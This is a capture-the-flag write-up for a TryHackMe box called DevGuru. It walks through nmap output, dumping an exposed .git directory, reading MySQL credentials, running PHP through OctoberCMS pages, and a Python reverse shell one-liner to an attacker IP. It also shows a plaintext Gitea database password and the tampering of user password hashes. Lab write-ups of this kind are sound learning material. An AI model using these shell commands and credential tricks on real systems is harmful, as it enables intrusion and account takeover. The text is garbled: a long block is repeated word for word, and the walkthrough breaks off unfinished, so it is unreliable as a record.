# TryHackMe-DevGuru
## NMAP
```
Nmap scan report for 10.10.172.205 [83/877]
Host is up (0.16s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git:
| 10.10.172.205:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK [54/877]
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=f886af904a2de78a; Path=/; HttpOnly
| Set-Cookie: _csrf=5bPJDT7tyJUhTZEjhejaOuL5wHU6MTYwNzE2ODk5ODQ5MDExOTg3MQ; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 05 Dec 2020 11:49:58 GMT
|
|
|
|
|
|
| Gitea: Git with a cup of tea
|
|
|
|
|
|
|
|
| Page Not Found - Gitea: Git with a cup of tea
|
|
|
|_
We don't see anything interesting on the web page. Looking at the nmap results there's a `git` directory we find so let's visit that directory
On visting find a page which tells us a reference to `master branch`
So it seems that there is a github repository on the box , so let's try to dump the files. We can use a tool for that which is called `GitTools`
`https://github.com/internetwache/GitTools`
After running the tool it took 22 minutes for me dump the `./git` directory
Now we cannot extract some useful data like this for that we have to use `Extractor` from GitTools
First move that dumped `./git` folder to a another folder then run the tool
As you can see it finds a bunch of files which makes our work way easier
Reading through the contents of `.htaccess` we find that there is a login page for database
Going back to that extracted folder of `./git` we can find `config/database.php` which has credentials for mysql database
And we can login ourself in , Great !
Now `Octobercms` has blocked extensions of `php` files , you could try changing the extensions to .php3,.php4,.php5,.phtml but it won't work , what we can do is run php code on html pages
`https://octobercms.com/forum/post/running-php-code-on-pages`
Here it tells how we can do that
As we can see it does run php code so now we have to craft a php reverse shell to get onto the box,Let's test this for a simple `$_GET["command"]`
And we can run system commands so only thing left to do is to setup a netcat listener and run a reverse shell command in that parameter.So I am going to use a python3 reverse shell because python3 is installed on the box
```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
And we got a shell finally , sweet !!
Now we must enumerate the box , to do that transfer `linpeas` on the target box by python http server
During the enumaration process we find some intersting backup files
Here we can see that there is another database for `gitea` which is running on port 8585,also we look at the bottom we'll find that we can use three hashing algorithms `bcrypt`,`pbkdf2` and `scrypt`
So let's login to the database like we did with `octoberdb`
Here I cloned the `frank` user but added a `bcrpyt` password for him because with `pbkdf2` it was not allowing me to login
```
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = UfFPTF8C8jjxVF2m
```
--------
Here we can find the password for `frank` but it's saved as bcrypt because of `$2$` at the beginning.It would be useless to try cracking the hash we can just add a user with the password encrypted with `bcrypt`
Then if we try to login we can access the dashboard of `OctoberCMS`
By going to `Settings` then `Event log` we can see there's an image
On visting find a page which tells us a reference to `master branch`
So it seems that there is a github repository on the box , so let's try to dump the files. We can use a tool for that which is called `GitTools`
`https://github.com/internetwache/GitTools`
After running the tool it took 22 minutes for me dump the `./git` directory
Now we cannot extract some useful data like this for that we have to use `Extractor` from GitTools
First move that dumped `./git` folder to a another folder then run the tool
As you can see it finds a bunch of files which makes our work way easier
Reading through the contents of `.htaccess` we find that there is a login page for database
Going back to that extracted folder of `./git` we can find `config/database.php` which has credentials for mysql database
And we can login ourself in , Great !
Now `Octobercms` has blocked extensions of `php` files , you could try changing the extensions to .php3,.php4,.php5,.phtml but it won't work , what we can do is run php code on html pages
`https://octobercms.com/forum/post/running-php-code-on-pages`
Here it tells how we can do that
As we can see it does run php code so now we have to craft a php reverse shell to get onto the box,Let's test this for a simple `$_GET["command"]`
And we can run system commands so only thing left to do is to setup a netcat listener and run a reverse shell command in that parameter.So I am going to use a python3 reverse shell because python3 is installed on the box
```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
And we got a shell finally , sweet !!
Now we must enumerate the box , to do that transfer `linpeas` on the target box by python http server
During the enumaration process we find some intersting backup files
Here we can see that there is another database for `gitea` which is running on port 8585,also we look at the bottom we'll find that we can use three hashing algorithms `bcrypt`,`pbkdf2` and `scrypt`
So let's login to the database like we did with `octoberdb`
Here I cloned the `frank` user but added a `bcrpyt` password for him because with `pbkdf2` it was not allowing me to login
```
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = UfFPTF8C8jjxVF2m
```
--------
Here we can find the password for `frank` but it's saved as bcrypt because of `$2$` at the beginning.It would be useless to try cracking the hash we can just add a user with the password encrypted with `bcrypt`
Then if we try to login we can access the dashboard of `OctoberCMS`
By going to `Settings` then `Event log` we can see there's an image